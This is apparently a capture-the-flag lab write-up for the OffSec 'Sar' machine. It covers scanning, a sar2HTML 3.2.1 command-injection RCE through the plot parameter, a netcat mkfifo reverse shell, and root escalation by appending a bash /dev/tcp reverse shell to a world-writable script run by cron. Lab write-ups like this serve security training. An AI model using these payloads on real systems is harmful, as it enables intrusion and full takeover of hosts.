Home OffSec PG - Sar

OffSec PG - Sar


Machine IP →

Network Scan

Nmap scan → nmap -A -Pn -p- -T4 -o nmap.txt

OS Detection → OS: Linux; CPE: cpe:/o:linux:linux_kernel


PortServiceOther details (if any)
22SSHOpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80HTTPApache httpd 2.4.29 ((Ubuntu))

Web Scan

GoBuster scan → gobuster dir -u -w /home/tanq/installations/SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x html,php,txt

Directories/files listed →

  • index.html
  • robots.txt
  • phpinfo.php

Robots txt reveals a directory sar2HTML, which has an index.php page. The version for the sar2HTML is 3.2.1.


Google-fu reveals the existence of an RCE exploit for the sar2HTML version 3.2.1. For this exploit, /sar2HTML/index.php?plot=;whoami executes the command. The result can be seen on the webpage. Therefore, this was used to enumerate presence of bash, python and netcat. The /etc/passwd file was also printed which revealed the 2 users of importance to be root and love.

Thus, a reverse shell can be spawned using bash payload rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 3002 >/tmp/f for the user www-data.

The user flag was in the /home/ directory.

Privilege Escalation

Looking at setuid binaries, the most interesting ones are arping and ping. Looking at the crontab, there is a process that runs every 5 mins as the root user → cd /var/www/html/ && sudo ./finally.sh. Checking the code of the file, it seems that it runs another file called write.sh, which is world writable.

Therefore, using a reverse shell payload to get connection from the machine would execute it as root, thereby, giving a root shell.

This can be done via echo "/bin/bash -c 'bash -i >& /dev/tcp/ 0>&1'" >> write.sh. This gives a shell in 5 minutes. Subsequently, it also gives the root flag.

This post is licensed under CC BY 4.0 by the author.